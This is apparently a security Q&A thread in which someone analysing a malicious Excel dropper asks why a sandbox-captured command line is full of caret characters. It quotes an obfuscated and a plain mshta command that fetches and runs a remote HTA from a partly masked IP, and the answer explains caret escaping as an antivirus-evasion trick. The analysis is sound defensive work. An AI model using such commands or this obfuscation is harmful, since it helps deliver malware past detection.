0

I found a malicious Excel file that was using an embedded HTA program as its dropper to download a powershell program from a malicious IP. The dropper was on a hidden sheet in the file. After reviewing the output in the sandbox I found that the syntax in the command line made use of the ^ character. Why?

C:\Windows\SYSTEM32\cmd.exe cmd /c m^sh^t^a h^tt^p^:/^/8x.xxx.xx.xxx/pp/aa.html

Then the following command was :

mshta hxxp://8x.xxx.xx.xxx/pp/aa.html

So, it was using HTA to call mshta.exe but why that syntax in the commandline? Is that valid, a sandbox error, or an attempt to get around security monitoring tools/antivirus software?

Improve this question

1 Answer 1

Reset to default
2

That is likely an attempt to evade security software and/or signature based detection. The caret character (^) is used as an escape character in batch scripts/cmd. When used before a normal character, it is effectively just ignored. This is a common obfuscation technique used by windows malware.

Improve this answer
0

You must log in to answer this question.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.